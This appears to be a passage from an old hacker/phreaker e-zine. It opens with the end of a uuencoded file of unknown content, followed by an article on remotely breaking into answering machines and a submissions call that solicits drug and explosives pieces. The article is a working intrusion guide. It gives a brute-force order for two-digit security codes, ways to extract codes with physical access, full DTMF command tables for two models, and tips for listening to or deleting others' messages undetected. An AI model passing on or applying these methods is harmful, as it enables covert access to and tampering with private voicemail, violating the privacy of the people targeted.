MA=\L<H>;3QP8:2H(40A,9R`H!!A0NQ0W%0!84/3>#+L<"PH``$`J!&<")O\9

M!7&B`W!?!\,YX&\SR8D-N``]!%E2#;`"_P4+@`*X=`*T/(!],(,)C54P@.3-

M(7)/B06XARV+V40I*BF+'39$&0#8N-P$B\B,R_;"@'41@+TY=0/H)@"XMRO\

M<KRW4/A-&(E=&A$<_`2<++DSTB5'D0$"H2V``(/:`*5@<S;`%8O*B]`FI5X7

MC948N8H2`PZT/PUS&9`I,]L[V'0@@`H0%!K(0^ORB],KT/F>'48$#T^T0)F`

M\/,$)L55#&OPS6]!<A!`H%MI(L^'UH)4]`H*"NON`3`B_$0FAYV$XDER!RO!

M:+AE"]V@"R4"^3C/VQW`F8/[!'8&M#X:!QT9SPB@)+9U#2)=.U7##0K[PR@1

MNVB"ZT10?@53^*HHN_Q&*.@]3P5TT!1U[+`:^<,!0-TOL@!`!$!I1TA`>40W

ME@%`458>1G">=PB`#_I=%$$=^XX*`D4?7@X66<-9*>A`1%'_=13H</\:@*(-

M0SP-=?3H9`P*=3)#73=,?3%+77.5""YC+@J`6YV`_[`*Z'O_)!&_*@$DT":,

M?(-]&O7:[LL-D1B1#O``?-7^=0[H]/YR4FQN7<O_Z_0?J0`*'_8?$XM.!DE^

M$8$'D`W_XOF*1G+?;05V2@)S'BL,*XO^Q78("1&Y:Q7HI/XDH)$.T`I#04:(

M!#N`,T%UZROQB`PWJJ[B!@$XDV0"8R4Z9ORL,N0KE23(%6NB_FM$A6C_$(O(

MXV0'X^B2$`$^_(O<C(]RVF*LJBAY-X[:D):$&A8*'@8VBT\"NAXZP78"BL$`

M)`J'U#:*!5]?DC(1##8(BK`$D#8&"\E_$0$#V@/Q*\%R$[-`0$@2?0(SR3M!

M4$T&B\'K9:IMO9I/"`2-%`!6#6BL)@`%<P@FQ@4%Z/]Y]M`#^4>*R`#FF9\>

M:($`!2OC*4>L/`%R(Q.L\JZ00'4<3^L?]-$KT'(10H)*8:9T#BO(A4(4`$IU

M\'3K""OXB\<V*T?^NP0?>$U($G.*)6<ZS.W,"B1XR70&[J9U`CK$!S"C$+`!

MJHH(VZJO-(BU"D$&[%UDT(C9FXT",2^-Q@@'#E"+1B(0!D@>T/[=,*A`TBT(

M_R'^(?\Z56S_)!2W%K'^!.[^%`AB]`QO_EZ*=PQ4@WY??D-NT@=:"%IV_E,Y

M`5$4`W%0I?-57%695;0=$1E6"`40OU<$@\(PM$'!X*-SV\%CE/`-(@;-D2(#

M7<56"LF4,QRT5C8%((8VZQ0>C78S1(EE@\<P,JK*F5?Z'V:(BD^+5@;E!>A)

MJC`I:YS1(#RY`'(ECI("=B8%+``S_Z,7_#@'!H48\J[K]$,#B_<8"D8,D?8Q

M%-!35@AB"/RJH`J+O`*#P,3XD\L\OX``(H@%1S/;XPD%44(@=P/JM(P[#78!

M.`W'*\9T!$-*==[#&@"8/&%R!CQZ=P(LV4L@3`X!AP#O#2$!!$C_7```E@"@

M`*4`M@"[`,``T0#6`-L`Y0#J`/L```$%`0\!%`$E`2H!+P$Y`3X!E0&F`;,!

MR0'.`=\!Y`'I`?H!_P$$`@X"$P(N`E(":P)W`GP"@0*2`LT"X0+M`OD"_@(#

M`P@#&0,A`R8#*P,T`TP#8`-E`Z,#J`.M`_P#`00&!%4$6@1?!'H$?P2)!(X$

MVP3O!/L$!P4,!1$%%@4G!2\%-`4Y!4(%505:!60%:05S!7@%A`6+!9`%F@6U

<!0-K`!<`*@`P`0/-``$`[@",!0"X`0!```"(!0"(

`

end

sum -r/size 12744/6826 section (from "begin" to "end")

sum -r/size 65037/4933 entire input file



------------------- CUT HERE -----------------





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                        Hacking Answering Machines

                        ~~~~~~~~~~~~~~~~~~~~~~~~~~

Ring

Ring

Click

"Hi, unfortunately I can't come to the phone right now. So, don't be 

scared and leave a message after the tone with your name and number and 

I'll call you back. Thanks !!"

Bip

Bip

Beeeeeep

[11]

[12]

[13]

[14]

Beep Beep Beep

[8]

"ermm, oh, Hi Jamie, just calling to remind you about mum's birthday.

See you Thursday"

Beep.

"Hello Jamie, its Nichola here, d'ya wanna catch a movie monday ? Gimme

a call when you get back, bye"

Beep.

"I got the couple of ounces you wanted. I've left them in your toolbox

round the back. By the way, if you still want that stereo drop me a

line. See ya round"





Boom. Paydirt !!





        Just about all the answering machines you can buy these days are

'remote controllable'. That is by use of DTMF tones you can playback

messages left on the machine, delete messages, record memos and in some

cases even re-record the OGM (out going message).



        Answering machines are rediculously easy to hack. To show just

how easy I quote from the Dialatron Designer 2500M manual:-



   "When you first install and set up your Designer 2500M, its security

 code is set to 12; you have a choice of five codes - 11,12,13,14 or 15."



FIVE CODES ?!?!?!?!?! I nearly died laughing. 



Accessing the machine

---------------------

        I have never come across an answering machine with more than a 

two digit code. This is the main security shortfall of common answering 

machines. To 'access' the answering machine the code must be entered 

either: a) While the OGM (the welcome message) is being played or b) 

During the period when the caller is supposed to leave their message.



Personally I always try codes in this order:

11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 33, 44, 55, 66, 77, 88, 99, 00



        Why ? Well most codes are still set as the default often only 

one digit. So running thru 11 - 20 goes thru all the single digit kodez 

as well as some common defaults. Also 11,22, 33 etc are also very 

common. 90% of the time this well get you the all important 'beeeep' to 

tell you you have access. If this still fails to work try the usual 

common numbers e.g. 10, 20, 30 etc etc

        

        Getting BlueBeep, BlueDial or another dialler to do the work is 

usally a good idea. But don't set the DTMF tone duration too short, as 

the answering machine may not recognise it, 70ms is usually sufficient.



        If you have physical access to a machine this is even better. 

There is always a way to get the current 'security' code. On the 

Dialtron Designer 2500M simply hold down the STOP button for 2 seconds, 

on the BT Response 400 press the CODE key and then either FF or REW. 

These two methods are pretty standard. It works for most answering 

machines. The best way is to get hold of the manual, and the best way to 

do that is go to your local answering machine supplier and say "I have 

lost the manual to my S00perAnswer 8000" at which point the rep will

either give you a manual or an address to get one.



        0K? You have access the next thing to do is to mess with it !

Below are the tones for controlling the BT Response 400 and the

Dialatron Designer 2500M as these work for 90% of answering machine si

have found....



Dialtron Designer 2500M

-----------------------





22      Clear Messages (press key twice)

3       Record Memo

4       Rewind (during message playback)

5       Stop

6       Fast Forward (during message playback)

7       Answer On

8       Play

99      Answer Off (press key twice)



If you have any problems call the Dialatron help line !

081 903 5224   9.00am  to 5.00pm Mon to Fri





BT Response 400

---------------



0 - Stop current operation/Remote switch off

1 - Rewind

2 - Play/Pause messages

3 - Fast Forward

4 - Save

5 - Erase

6 - Reset a message or memo

7 - Stop/Start announcement recording

8 - Stop/Start memo recording

9 - Play/Pause memo

# - Start remote interrogation

* - Announcement skip



Dangers

-------

        Make sure the answering machine you are calling is capable of

remote operation, or is switched into 'Remote' mode. This is usually a

risk you have to take. If you came home, checked your ansafone to hear a

couple of messages which were nothing but tones most people with half a

brain will guess that some-one is trying to remotely hack their machine !

        Make sure that no-one is in when you try you hack an ansafone.

A lot of people too lazy to answer the phone simply let the answer

machine get the call. Which means they will be happily sitting in their

armchair watching TV when they hear their answering machine go thru all

the left messages and have the welcome message changed to "I am sorry I

am out having assorted continental vegetables inserted into my rectum.

Please leave a message after the tone."



Finally

-------

        Hacking answering machines is *very* easy and has limited uses,

but its a laugh and you can come across a few little nuggets of

information. It is also completely anonymous, and unless you change

something you can listen to left messages undetected ! If you are really

serious about intruding on a target machine. Find out what make/model it

is and get the manual.



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+



                                 Dah Last Bit

                                 ~~~~~~~~~~~~



        For the next issue we'd kinda like submissions on the following 

subjects:-



                        Cellular Hacking/Phreaking

                             Comment/Opinion

                                 Hacking

                                Phreaking

                    Interesting ways of Imbibing Dope

                          Things that go KaBoom!

                           Amusing Pranks/Gags

                             kEwL Koding trix

                   Errmmmm, same as last time really !



You know what we're after, anything will be considered (and probably 

published) so get tapping.



I have been using two FTP sites recently that you may find interesting...



corrupt.sekurity.com

H/P WaReZ in yEr face - h/p stuff and more



hyperreal.com

THE psychdelic server, has info on everything from smartdrugs to dope to 

psychedelics also rave info and some WeIrD visual madness !! 



also a bot on IRC called   lamerbot  usually on the #virus channel has

loads of hack/phreak/virus stuff on it aswell as

anti-feds-good-ole-in-yer-face-underground-rebellion type stuff so check

it out !! Especially a demo for the PC called TIMELESS.ZIP on there

somewhere (can't remember where exactly in some /demo directory). The

usual  /msg lamerbot help  gets you started.



Drop us a line. Even if ya just wanna say Hi or ask a question. As you

may of guessed we're not the sort of ppl who flame others because of our

elitist fantasies. H/P is about communicating ! (and writing articles

for CiTR0NiC !!!)



In case you are terminally stupid our e-mail address is once again...



an119774@anon.penet.fi an119774@anon.penet.fi an119774@anon.penet.fi

an119774@anon.penet.fi an119774@anon.penet.fi an119774@anon.penet.fi

an119774@anon.penet.fi an119774@anon.penet.fi an119774@anon.penet.fi



[EOF]